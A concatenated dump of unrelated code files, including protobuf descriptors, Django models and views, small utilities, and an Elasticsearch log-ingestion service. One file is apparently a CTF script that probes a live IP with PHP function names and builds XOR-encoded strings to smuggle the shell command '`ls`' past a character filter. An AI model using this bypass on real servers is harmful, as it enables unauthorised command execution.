full_name="google.api.Distribution.sum_of_squared_deviation",
index=2,
number=3,
type=1,
cpp_type=5,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="range",
full_name="google.api.Distribution.range",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="bucket_options",
full_name="google.api.Distribution.bucket_options",
index=4,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="bucket_counts",
full_name="google.api.Distribution.bucket_counts",
index=5,
number=7,
type=3,
cpp_type=2,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="exemplars",
full_name="google.api.Distribution.exemplars",
index=6,
number=10,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[
_DISTRIBUTION_RANGE,
_DISTRIBUTION_BUCKETOPTIONS,
_DISTRIBUTION_EXEMPLAR,
],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=106,
serialized_end=963,
)
_DISTRIBUTION_RANGE.containing_type = _DISTRIBUTION
_DISTRIBUTION_BUCKETOPTIONS_LINEAR.containing_type = _DISTRIBUTION_BUCKETOPTIONS
_DISTRIBUTION_BUCKETOPTIONS_EXPONENTIAL.containing_type = _DISTRIBUTION_BUCKETOPTIONS
_DISTRIBUTION_BUCKETOPTIONS_EXPLICIT.containing_type = _DISTRIBUTION_BUCKETOPTIONS
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name[
"linear_buckets"
].message_type = _DISTRIBUTION_BUCKETOPTIONS_LINEAR
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name[
"exponential_buckets"
].message_type = _DISTRIBUTION_BUCKETOPTIONS_EXPONENTIAL
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name[
"explicit_buckets"
].message_type = _DISTRIBUTION_BUCKETOPTIONS_EXPLICIT
_DISTRIBUTION_BUCKETOPTIONS.containing_type = _DISTRIBUTION
_DISTRIBUTION_BUCKETOPTIONS.oneofs_by_name["options"].fields.append(
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name["linear_buckets"]
)
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name[
"linear_buckets"
].containing_oneof = _DISTRIBUTION_BUCKETOPTIONS.oneofs_by_name["options"]
_DISTRIBUTION_BUCKETOPTIONS.oneofs_by_name["options"].fields.append(
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name["exponential_buckets"]
)
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name[
"exponential_buckets"
].containing_oneof = _DISTRIBUTION_BUCKETOPTIONS.oneofs_by_name["options"]
_DISTRIBUTION_BUCKETOPTIONS.oneofs_by_name["options"].fields.append(
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name["explicit_buckets"]
)
_DISTRIBUTION_BUCKETOPTIONS.fields_by_name[
"explicit_buckets"
].containing_oneof = _DISTRIBUTION_BUCKETOPTIONS.oneofs_by_name["options"]
_DISTRIBUTION_EXEMPLAR.fields_by_name[
"timestamp"
].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_DISTRIBUTION_EXEMPLAR.fields_by_name[
"attachments"
].message_type = google_dot_protobuf_dot_any__pb2._ANY
_DISTRIBUTION_EXEMPLAR.containing_type = _DISTRIBUTION
_DISTRIBUTION.fields_by_name["range"].message_type = _DISTRIBUTION_RANGE
_DISTRIBUTION.fields_by_name[
"bucket_options"
].message_type = _DISTRIBUTION_BUCKETOPTIONS
_DISTRIBUTION.fields_by_name["exemplars"].message_type = _DISTRIBUTION_EXEMPLAR
DESCRIPTOR.message_types_by_name["Distribution"] = _DISTRIBUTION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Distribution = _reflection.GeneratedProtocolMessageType(
"Distribution",
(_message.Message,),
{
"Range": _reflection.GeneratedProtocolMessageType(
"Range",
(_message.Message,),
{
"DESCRIPTOR": _DISTRIBUTION_RANGE,
"__module__": "google.api.distribution_pb2"
# @@protoc_insertion_point(class_scope:google.api.Distribution.Range)
},
),
"BucketOptions": _reflection.GeneratedProtocolMessageType(
"BucketOptions",
(_message.Message,),
{
"Linear": _reflection.GeneratedProtocolMessageType(
"Linear",
(_message.Message,),
{
"DESCRIPTOR": _DISTRIBUTION_BUCKETOPTIONS_LINEAR,
"__module__": "google.api.distribution_pb2"
# @@protoc_insertion_point(class_scope:google.api.Distribution.BucketOptions.Linear)
},
),
"Exponential": _reflection.GeneratedProtocolMessageType(
"Exponential",
(_message.Message,),
{
"DESCRIPTOR": _DISTRIBUTION_BUCKETOPTIONS_EXPONENTIAL,
"__module__": "google.api.distribution_pb2"
# @@protoc_insertion_point(class_scope:google.api.Distribution.BucketOptions.Exponential)
},
),
"Explicit": _reflection.GeneratedProtocolMessageType(
"Explicit",
(_message.Message,),
{
"DESCRIPTOR": _DISTRIBUTION_BUCKETOPTIONS_EXPLICIT,
"__module__": "google.api.distribution_pb2"
# @@protoc_insertion_point(class_scope:google.api.Distribution.BucketOptions.Explicit)
},
),
"DESCRIPTOR": _DISTRIBUTION_BUCKETOPTIONS,
"__module__": "google.api.distribution_pb2"
# @@protoc_insertion_point(class_scope:google.api.Distribution.BucketOptions)
},
),
"Exemplar": _reflection.GeneratedProtocolMessageType(
"Exemplar",
(_message.Message,),
{
"DESCRIPTOR": _DISTRIBUTION_EXEMPLAR,
"__module__": "google.api.distribution_pb2"
# @@protoc_insertion_point(class_scope:google.api.Distribution.Exemplar)
},
),
"DESCRIPTOR": _DISTRIBUTION,
"__module__": "google.api.distribution_pb2"
# @@protoc_insertion_point(class_scope:google.api.Distribution)
},
)
_sym_db.RegisterMessage(Distribution)
_sym_db.RegisterMessage(Distribution.Range)
_sym_db.RegisterMessage(Distribution.BucketOptions)
_sym_db.RegisterMessage(Distribution.BucketOptions.Linear)
_sym_db.RegisterMessage(Distribution.BucketOptions.Exponential)
_sym_db.RegisterMessage(Distribution.BucketOptions.Explicit)
_sym_db.RegisterMessage(Distribution.Exemplar)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
996,168 | f8a28ff6f6d74a7b778008d5354ef7c28c38e691 | # Keywords
# and: logical operator
# or: logical operator
# not: logical operator
# del: deletes an object
# import: allows you import a module
# from: import specific parts of a module
# while: begins the while loops
# as: creates an alias when importing
# global: declare a global variable
# with: used to simplify exception handling
# assert: for debugging
# if: keyword used for branching code
# elif: keyword used for branching code
# else: key workd used for branching code
# pass: a statement that does nothing but can be used as a placeholder
# yield: ends a function and returns a generator
# break: breaks out of a loop
# except: what to do when an exception occurs
# class: define a class
# in: check if a value is inside a list
# raise: raise an exception
# continue: continue to the next iteration of the loop
# finally: a block of code that executes no matter what
# is: tests if 2 variables are equal
# return: returns something from a function
# def: define a function
# for: create a for loop
# lambda: create an anonymous function
# try: makes a try except statement
# DATA TYPES
# Integers
# floats
# Strings
# Booleans
# Lists
# OPERATORS
# + Add
# - Subtract
# * Multiply
# ** Raise to the power of
# / Divide
# // Divide and remove decimal places
# % modulus
# < less than
# > greater than
# <= less than or equal to
# >= greater than or equal to
# == equality test
# != not equal to
# () used for parameters
# [] used with a List
# {} used to map a dictionary
# @ class/function decarator
# , item seperator
# : start a block of code e.g. if, else, while function ...
# = assign
# ; used to put multiple statments on one line
# += increment operator also can do -= *= /= //= %= **=
# . dot operator used to access function variables from other pyhton files
|
996,169 | dfbc69fe736e4891ff33bb7d053d54eae0a927e9 | from django.db import models
# Create your models here.
class Prestamo(models.Model):
codigo = models.AutoField(primary_key=True)
fechaSalida = models.CharField(max_length=50)
fechaRegreso = models.CharField(max_length=50)
def cuota():
pass
def __str__(self):
return str(self.codigo)
class Material(models.Model):
codigo = models.AutoField(primary_key=True)
tipoMaterial = models.CharField(max_length=50)
autor = models.CharField(max_length=50)
titulo = models.CharField(max_length=50)
año = models.IntegerField()
status = models.CharField(max_length=50)
prestamo = models.ForeignKey('Prestamo', on_delete=models.CASCADE, null = False)
def altaMaterial():
pass
def bajaMaterial():
pass
def cambioMaterial():
pass
def __str__(self):
return str(self.tipoMaterial)
class Persona(models.Model):
prestamo = models.OneToOneField('Prestamo', on_delete = models.CASCADE, null = False)
tipoPersona = models.CharField(max_length = 100)
nombre = models.CharField(max_length = 30)
apellido = models.CharField(max_length = 30)
telefono = models.IntegerField()
correo = models.CharField(max_length = 30)
numLibros = models.IntegerField()
adeudo = models.FloatField()
def llevarMaterial():
pass
def dejarMaterial():
pass
def __str__(self):
return str(self.nombre)
class Libro(Material):
editorial = models.CharField(max_length=50)
portada = models.FileField(blank = True)
def __str__(self):
return str(self.titulo)
class Revista(Material):
def __str__(self):
return str(self.titulo)
class Profesor(Persona):
numEmpleado = models.AutoField(primary_key=True)
def __str__(self):
return str(self.nombre)
class Alumno(Persona):
matricula = models.AutoField(primary_key=True)
def __str__(self):
return str(self.nombre)
|
996,170 | c5e250228a5bc3a39468c1725d660e33398c092c |
'''
Author: lanyongliang
Email: lanyongliang@xdf.cn
Date: 2021-07-15 00:12:02
LastEditors: Please set LastEditors
LastEditTime: 2021-07-15 01:21:58
FilePath: \BinarySearch\binary_search.py
'''
import random
class BinarySearch(object):
"""
1、二分查找必须是有序类表
2、选好起始查找位置,中间开始,减少一半的查找元素
3、时间复杂度为 ${log_2 10}$
"""
def __call__(self, search_list, num):
output = self.search(search_list, num)
return output
def search(self, search_list, num):
end = len(search_list)
start = 0
guess = (start + end) // 2
while start < guess:
if len(search_list) >= 1:
if search_list[guess] == num:
return guess
elif search_list[guess] > num:
end = guess
else:
start = guess + 1
guess = (start + end) // 2
else:
return None
random_list = random.sample(range(0,100),20)
random_list.sort()
binary_search = BinarySearch()
print("查找集合:{}".format(random_list))
output = binary_search(random_list, 10)
print("output:{}".format(output))
|
996,171 | 8616a9e3edc17018eaa50d861a8b56930bcc2b92 | import json
from sys import argv
basic = {}
model = {}
te = ['economist.json','economist_basic.json','economist_model.json']
cet46 = ['cet46.json','cet46_basic.json','cet46_model.json']
script,dic = argv
if dic == 'te':
dicc = te
else:
dicc = cet46
print(dicc)
with open(dicc[0],'r')as fo:
adic = json.load(fo)
dicLen = len(adic)
for word in adic:
try:
db = {'ex':adic[word]['ex'],'pron':adic[word]['pron']}
dm = {'eg2':adic[word]['eg2']}
try:
dm['wp'] = adic[word]['wp']
except Exception as err:
print(err)
try:
db['st'] = adic[word]['st']
except Exception as err:
print(err)
finally:
basic[word] = db
model[word] = dm
except Exception as err:
print(err,'seperate error: ',word)
with open(dicc[1],'w')as fb:
json.dump(basic,fb)
with open(dicc[2],'w')as fm:
json.dump(model,fm)
print(dicLen)
|
996,172 | 938080bb0fcd67611824436d8578cc2e955fd039 | from azure.cosmosdb.sql.models import (
Database,
Collection,
)
from azure.cosmosdb.sql.documentservice import DocumentService |
996,173 | 531dc7a3ec909f0d7f90caef9804e0da1712d14d | # RazviOverflow
# Python3
'''
import requests
url = "http://192.46.227.32/"
functions = ["get_called_class","get_parent_class","get_included_files","get_required_files","get_class_vars","get_object_vars","get_class_methods","get_declared_classes","get_declared_traits","get_declared_interfaces","get_defined_functions","get_defined_vars","get_resource_type","get_resources","get_loaded_extensions","get_extension_funcs","get_defined_constants","getdate","get_html_translation_table","getimagesize","getimagesizefromstring","getrandmax","getservbyname","getservbyport","getprotobyname","getprotobynumber","getmyuid","getmygid","getmypid","getmyinode","getlastmod","getenv","getopt","gettimeofday","getrusage","get_current_user","get_cfg_var","get_magic_quotes_gpc","get_magic_quotes_runtime","get_include_path","gethostbyaddr","gethostbyname","gethostbynamel","gethostname","getmxrr","gettype","get_meta_tags","get_headers","get_browser","getcwd","getallheaders","gettext","get_lucky_number","get_lucky_word"]
for function in functions:
print("[+] Requesting " + function)
print(requests.get(url, params={'roll' : function}).text)
print("[+] Requesting " + function + " as array")
print(requests.get(url, params={'roll' : "var_dump(" + function + "())"}).text)
def get_xor_strings(expected, valids):
word1 = ""
word2 = ""
for i in expected:
for valid in valids:
result = chr(ord(i) ^ ord(valid))
if result in valids:
word1 = word1 + result
word2 = word2 + valid
break
return word1, word2
'''
import string
def xor(str1, str2):
result = []
for i, j in zip(str1, str2):
result.append(chr(ord(i) ^ ord(j)))
return ''.join(result)
def get_xor_strings(expected, valids):
word1 = ""
word2 = ""
for i in expected:
for valid in valids:
result = chr(ord(i) ^ ord(valid))
if result in valids:
word1 = word1 + result
word2 = word2 + valid
break
return word1, word2
valids = [ ]
for item in string.ascii_letters:
valids.append(item)
valids.append("(")
valids.append(")")
valids.append("_")
valids.append(".")
valids = valids[:len(valids)]
print("[+] Generated valids => {}".format(valids))
expected = "`ls`"
word1, word2 = get_xor_strings(expected, valids)
print("[+] Word 1 {}- Word2 {}".format(word1, word2))
result = xor(word1, word2)
print("[+] Verifying... Should be {} => {}".format(expected, result)) |
996,174 | af0b4af6fe93da2f51a0b1b153010546a499f296 | from django.contrib import admin
from .models import Place, Trend, Placetype, Layer, Clusters, Word, TrendWord
class PlaceAdmin(admin.ModelAdmin):
search_fields = ('name', 'another_name')
class PlaceElement(admin.TabularInline):
model = Place
class TrendAdmin(admin.ModelAdmin):
search_fields = ('name',)
class ClustersWord(admin.TabularInline):
model = Word
class ClustersAdmin(admin.ModelAdmin):
search_fields = ('name',)
inlines = [ClustersWord,]
class WordAdmin(admin.ModelAdmin):
search_fields = ('name',)
class LayerAdmin(admin.ModelAdmin):
search_fields = ('name',)
inlines = [PlaceElement,]
class TrendWordAdmin(admin.ModelAdmin):
search_fields = ('trend_id', 'word_id',)
admin.site.register(Layer, LayerAdmin)
admin.site.register(Place, PlaceAdmin)
admin.site.register(Trend, TrendAdmin)
admin.site.register(Placetype)
admin.site.register(Word, WordAdmin)
admin.site.register(Clusters, ClustersAdmin)
admin.site.register(TrendWord, TrendWordAdmin)
|
996,175 | 4f85e7e8086fbabe669a0209867984b52af3a65f | from django.contrib.auth.mixins import UserPassesTestMixin
from rest_framework import parsers, permissions, status
from rest_framework.exceptions import PermissionDenied
from rest_framework.generics import get_object_or_404
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework.viewsets import ModelViewSet
from accounts.models import Account
from albums.models import Album
from albums.modules.response_templates.photo import save_template
from albums.serializers import PhotoUploadSerializer, PhotoSerializer, AlbumCreateSerializer, AlbumSerializer, \
SinglePhotoSerializer
class ApiPrivateAlbumCreate(APIView):
"""
Create a generic album for logged-in user
post:
- name: str
- is_public: bool
"""
permission_classes = [permissions.IsAuthenticated]
def post(self, request, *args, **kwargs):
serializer = AlbumCreateSerializer(data=request.data)
if serializer.is_valid():
v = serializer.validated_data
album_data = {
'name': v.get('name'),
'is_public': v.get('is_public'),
'profile': request.user.base_profile()
}
album = Album.objects.create(**album_data)
response_serializer = AlbumSerializer(album)
return Response(response_serializer.data, status=status.HTTP_200_OK)
return Response(serializer.errros, status=status.HTTP_400_BAD_REQUEST)
class ApiPrivateAlbumPostUploadPhoto(APIView):
"""
Upload a photo to a specified album (via pk)
?album=<pk>
photo: file
caption: string
"""
parser_classes = [parsers.MultiPartParser, parsers.FormParser, parsers.JSONParser]
permission_classes = [permissions.IsAuthenticated]
def post(self, request, *args, **kwargs):
album = get_object_or_404(Album, pk=request.GET.get('album', None), profile=request.user.base_profile())
# auth check
if not album.verify_ownership(request.user):
return Response("Unauthorized access", status=status.HTTP_401_UNAUTHORIZED)
# /auth check
serializer = PhotoUploadSerializer(data=request.data)
if serializer.is_valid():
photo = serializer.save()
photo.album = album
photo.save()
photo.set_primary_photo()
response_data = save_template(**{
'as_json': False,
'status': status.HTTP_200_OK,
'request': request,
'result': PhotoSerializer(photo).data
})
return Response(response_data, status=status.HTTP_200_OK)
else:
response_data = save_template(**{
'as_json': False,
'status': status.HTTP_500_INTERNAL_SERVER_ERROR,
'request': request,
'result': serializer.errors
})
return Response(response_data, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
class ApiPrivatePhotoViewSet(UserPassesTestMixin, ModelViewSet):
parser_classes = [parsers.MultiPartParser, parsers.JSONParser]
permission_classes = [permissions.IsAuthenticated]
serializer_class = PhotoSerializer
def test_func(self):
try:
album = Album.objects.get(pk=self.request.POST.get('album'))
except Album.DoesNotExist:
raise FileNotFoundError
token = self.request.META.get('HTTP_AUTHORIZATION').split(" ")[1]
user = Account.objects.get(auth_token__key=token)
if user.base_profile() != album.profile:
raise PermissionDenied
return True
|
996,176 | 7801e8f182c7d2270836007ed69c859169927296 | import base64
import boto3
import botocore
import json
import os
import requests
import time
# Function - Get token
def get_token():
response = requests.get('http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token', headers={"Metadata-Flavor":"Google"})
return response.json().get('access_token')
# Function - Decrypt data with KMS key
def decrypt_secret_kms(secret):
token = get_token()
request_suffix = kms_key_id+':decrypt'
request_json_data = {'ciphertext': secret}
response = requests.post('https://kms.yandex/kms/v1/keys/'+request_suffix, data=json.dumps(request_json_data), headers={"Accept":"application/json", "Authorization": "Bearer "+token})
b64_data = response.json().get('plaintext')
return base64.b64decode(b64_data).decode()
# Configuration - Get ElasticSearch CA.pem
def get_elastic_cert():
file = '/app/include/CA.pem'
if os.path.isfile(file):
return file
else:
url = 'https://storage.yandexcloud.net/cloud-certs/CA.pem'
response = requests.get(url)
with open('/app/include/CA.pem', 'wb') as f:
f.write(response.content)
return file
# Configuration - Keys
elastic_auth_pw_encr = os.environ['ELK_PASS_ENCR']
kms_key_id = os.environ['KMS_KEY_ID']
s3_key_encr = os.environ['S3_KEY_ENCR']
s3_secret_encr = os.environ['S3_SECRET_ENCR']
# Configuration - Setting up variables for ElasticSearch
elastic_auth_pw = decrypt_secret_kms(elastic_auth_pw_encr)
elastic_auth_user = os.environ['ELASTIC_AUTH_USER']
elastic_server = os.environ['ELASTIC_SERVER']
kibana_server = os.environ['KIBANA_SERVER']
elastic_cert = get_elastic_cert()
# Configuration - Setting up variables for S3
s3_bucket = os.environ['S3_BUCKET']
s3_key = decrypt_secret_kms(s3_key_encr)
s3_local = '/tmp/data'
s3_secret = decrypt_secret_kms(s3_secret_encr)
# Configuration - Sleep time
if(os.getenv('SLEEP_TIME') is not None):
sleep_time = int(os.environ['SLEEP_TIME'])
else:
sleep_time = 240
# Configuration - Log type
if os.getenv("AUDIT_LOG_PREFIX") is not None:
s3_folder = os.environ['AUDIT_LOG_PREFIX'].rstrip("/")
elastic_index_alias = "k8s-audit"
elastic_index_name = f"{elastic_index_alias}-index-000001"
elastic_index_template = f"{elastic_index_alias}-template"
elastic_index_ilm = f"{elastic_index_alias}-ilm"
elastic_index_pipeline = f"{elastic_index_alias}-pipeline"
elif os.getenv("FALCO_LOG_PREFIX") is not None:
s3_folder = os.environ['FALCO_LOG_PREFIX'].rstrip("/")
elastic_index_alias = "k8s-falco"
elastic_index_name = f"{elastic_index_alias}-index-000001"
elastic_index_template = f"{elastic_index_alias}-template"
elastic_index_ilm = f"{elastic_index_alias}-ilm"
elastic_index_pipeline = f"{elastic_index_alias}-pipeline"
elif os.getenv("KYVERNO_LOG_PREFIX") is not None:
s3_folder = os.environ['KYVERNO_LOG_PREFIX'].rstrip("/")
elastic_index_alias = "k8s-kyverno"
elastic_index_name = f"{elastic_index_alias}-index-000001"
elastic_index_template = f"{elastic_index_alias}-template"
elastic_index_ilm = f"{elastic_index_alias}-ilm"
elastic_index_pipeline = f"{elastic_index_alias}-pipeline"
# State - Setting up S3 client
s3 = boto3.resource('s3',
endpoint_url = 'https://storage.yandexcloud.net',
aws_access_key_id = s3_key,
aws_secret_access_key = s3_secret
)
sqs = boto3.client(
service_name = 'sqs',
endpoint_url = 'https://message-queue.api.cloud.yandex.net',
region_name = 'ru-central1',
aws_access_key_id = s3_key,
aws_secret_access_key = s3_secret
)
# Configuration - YMQ
sqs_url = os.environ['YMQ_URL']
# Function - Create config index in ElasticSearch
def create_config_index():
request_suffix = f"/.state-{elastic_index_alias}"
response = requests.get(elastic_server+request_suffix, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw))
if(response.status_code == 404):
request_suffix = f"/.state-{elastic_index_alias}/_doc/1"
request_json = """{
"is_configured": true
}"""
response = requests.post(elastic_server+request_suffix, data=request_json, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"Content-Type":"application/json"})
print('Config index -- CREATED')
print(f"{response.status_code} -- {response.text}")
else:
print('Config index -- EXISTS')
print(f"{response.status_code} -- {response.text}")
# Function - Get config index state
def get_config_index_state():
request_suffix = f"/.state-{elastic_index_alias}/_doc/1/_source"
response = requests.get(elastic_server+request_suffix, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw))
if(response.status_code != 200):
return False
return response.json()['is_configured']
# Function - Create ingest pipeline
def create_ingest_pipeline():
request_suffix = f"/_ingest/pipeline/{elastic_index_pipeline}"
data_file = open(f"/app/include/{elastic_index_alias}/pipeline.json") # заменить на прямую ссылку github когда репо станет публичным
data_json = json.load(data_file)
data_file.close()
response = requests.put(elastic_server+request_suffix, json=data_json, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw))
if(response.status_code == 200):
print('Ingest pipeline -- CREATED')
print(f"{response.status_code} -- {response.text}")
# Function - Create an index template
def create_index_template():
request_suffix = f"/_index_template/{elastic_index_template}"
data_file = open(f"/app/include/{elastic_index_alias}/index-template.json")
data_json = json.load(data_file)
data_file.close()
response = requests.put(elastic_server+request_suffix, json=data_json, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"Content-Type":"application/json"})
if(response.status_code == 200):
print('Index template -- CREATED')
print(f"{response.status_code} - {response.text}")
def create_lifecycle_policy():
request_suffix = f"/_ilm/policy/{elastic_index_ilm}"
request_json = """{
"policy": {
"phases": {
"hot": {
"min_age": "0ms",
"actions": {
"rollover": {
"max_age": "30d",
"max_primary_shard_size": "50gb"
}
}
}
}
}
}"""
response = requests.put(elastic_server+request_suffix, data=request_json, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"Content-Type":"application/json"})
if(response.status_code == 200):
print('Index lifecycle policy -- CREATED')
print(f"{response.status_code} - {response.text}")
# Function - Create an index
def create_first_index():
request_suffix = f"/{elastic_index_name}"
response = requests.put(elastic_server+request_suffix, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw))
if(response.status_code == 200):
print(f"Index {elastic_index_name} -- CREATED")
print(f"{response.status_code} - {response.text}")
# Function - Create an index alias
def create_index_alias():
request_suffix = f"/_aliases"
request_json = """{
"actions" : [
{ "add" : { "index" : "%s", "alias" : "%s" } }
]
}""" % (elastic_index_name, elastic_index_alias)
response = requests.post(elastic_server+request_suffix, data=request_json, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"Content-Type":"application/json"})
if(response.status_code == 200):
print('Index alias -- CREATED')
print(f"{response.status_code} - {response.text}")
# Function - Refresh index
def refresh_index():
request_suffix = f"/{elastic_index_alias}/_refresh"
response = requests.post(elastic_server+request_suffix, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw))
if(response.status_code == 200):
print('Index -- REFRESHED')
print(f"{response.status_code} -- {response.text}")
# Function - Check detection engine index
def get_detections_engine():
request_suffix = f"/s/default/api/detection_engine/index"
response = requests.get(kibana_server+request_suffix, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"kbn-xsrf":"true"})
if(response.status_code == 200):
return True
else:
print(f"{response.status_code} - {response.text}")
return False
# Function - Preconfigure Kibana
def configure_kibana():
# Index pattern
file = f"/app/include/{elastic_index_alias}/index-pattern.ndjson"
if os.path.isfile(file):
data_file = {
'file': open(file, 'rb')
}
request_suffix = '/api/saved_objects/_import'
response = requests.post(kibana_server+request_suffix, files=data_file, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"kbn-xsrf":"true"})
if(response.status_code == 200):
print('Index pattern -- IMPORTED')
print(f"{response.status_code} -- {response.text}")
# Filters
file = f"/app/include/{elastic_index_alias}/filters.ndjson"
if os.path.isfile(file):
data_file = {
'file': open(file, 'rb')
}
request_suffix = '/api/saved_objects/_import'
response = requests.post(kibana_server+request_suffix, files=data_file, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"kbn-xsrf":"true"})
if(response.status_code == 200):
print('Filters -- IMPORTED')
print(f"{response.status_code} -- {response.text}")
# Search
file = f"/app/include/{elastic_index_alias}/search.ndjson"
if os.path.isfile(file):
data_file = {
'file': open(file, 'rb')
}
request_suffix = '/api/saved_objects/_import'
response = requests.post(kibana_server+request_suffix, files=data_file, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"kbn-xsrf":"true"})
if(response.status_code == 200):
print('Searches -- IMPORTED')
print(f"{response.status_code} -- {response.text}")
# Dashboard
file = f"/app/include/{elastic_index_alias}/dashboard.ndjson"
if os.path.isfile(file):
data_file = {
'file': open(file, 'rb')
}
request_suffix = '/api/saved_objects/_import'
response = requests.post(kibana_server+request_suffix, files=data_file, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"kbn-xsrf":"true"})
if(response.status_code == 200):
print('Dashboard -- IMPORTED')
print(f"{response.status_code} -- {response.text}")
# Detections
# Pre-create detections index
if not get_detections_engine():
request_suffix = '/s/default/api/detection_engine/index'
response = requests.post(kibana_server+request_suffix, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"kbn-xsrf":"true"})
if(response.status_code == 200):
print('Detections -- SIEM rules index pre-created')
print(f"{response.status_code} - {response.text}")
file = f"/app/include/{elastic_index_alias}/detections.ndjson"
if os.path.isfile(file):
data_file = {
'file': open(file, 'rb')
}
request_suffix = '/api/detection_engine/rules/_import'
response = requests.post(kibana_server+request_suffix, files=data_file, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"kbn-xsrf":"true"})
if(response.status_code == 200):
print('Detections -- IMPORTED')
print(f"{response.status_code} -- {response.text}")
# Function - Clean up S3 folder
def delete_object_s3(s3_bucket, s3_object):
b = s3.Bucket(s3_bucket)
b.delete_objects(
Delete={
'Objects': [
{
'Key': s3_object
},
]
}
)
# Function - Delete SQS message
def delete_sqs_message(msg):
sqs.delete_message(
QueueUrl=sqs_url,
ReceiptHandle=msg.get('ReceiptHandle')
)
# Function - Process JSON logs batch
def process_s3_batch(bucket, folder, local=None):
print('JSON processing -- STARTED')
parse_substring = '".": {}, '
processing = True
request_suffix = f"/{elastic_index_alias}/_bulk?pipeline={elastic_index_pipeline}"
while processing:
b = s3.Bucket(bucket)
messages = sqs.receive_message(
QueueUrl=sqs_url,
MaxNumberOfMessages=10,
VisibilityTimeout=60,
WaitTimeSeconds=20
).get('Messages')
if(messages == None):
processing = False
continue
for msg in messages:
msg_body = json.loads(msg.get('Body'))
source = msg_body['object_id']
cloud_id = msg_body['cloud_id']
folder_id = msg_body['folder_id']
cluster_id = msg_body['cluster_id']
cluster_url = msg_body['cluster_url']
if source[-1] == '/':
delete_sqs_message(msg)
continue
target = source if local is None \
else os.path.join(local, source)
if not os.path.exists(os.path.dirname(target)):
os.makedirs(os.path.dirname(target))
try:
b.download_file(source, target)
except botocore.exceptions.ClientError as e:
sqs.delete_message(
QueueUrl=sqs_url,
ReceiptHandle=msg.get('ReceiptHandle')
)
continue
with open(target, "r") as raw_file:
lines = []
for line in raw_file:
lines.append('{"index":{}},')
line = line.replace(parse_substring, "")
lines.append(f"{line.rstrip()[:-1]}, \"cloud_id\": \"{cloud_id}\", \"folder_id\": \"{folder_id}\", \"cluster_id\": \"{cluster_id}\", \"cluster_url\": \"{cluster_url}\"}},")
lines[-1] = lines[-1][:-1]+"\n"
data = "\n".join(lines)
response = requests.post(elastic_server+request_suffix, \
data=data, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), \
headers={"Content-Type":"application/json"})
if(response.status_code == 200):
delete_object_s3(s3_bucket, source)
delete_sqs_message(msg)
os.remove(target)
print(response.text)
else:
print(response.text)
print(f"JSON processing -- COMPLETE")
# Process - Upload data
def upload_logs():
if(get_config_index_state()):
print("Config index -- EXISTS")
process_s3_batch(s3_bucket, s3_folder, s3_local)
refresh_index()
else:
create_lifecycle_policy()
create_index_template()
create_first_index()
create_index_alias()
create_ingest_pipeline()
configure_kibana()
create_config_index()
process_s3_batch(s3_bucket, s3_folder, s3_local)
refresh_index()
### MAIN CONTROL PANEL
upload_logs()
print("Sleep -- STARTED")
time.sleep(sleep_time) |
996,177 | d5cab69de54048e40940ed232e10222a54e3a1a9 | from secret import flag, key
f = open('ciphertext.txt', 'w')
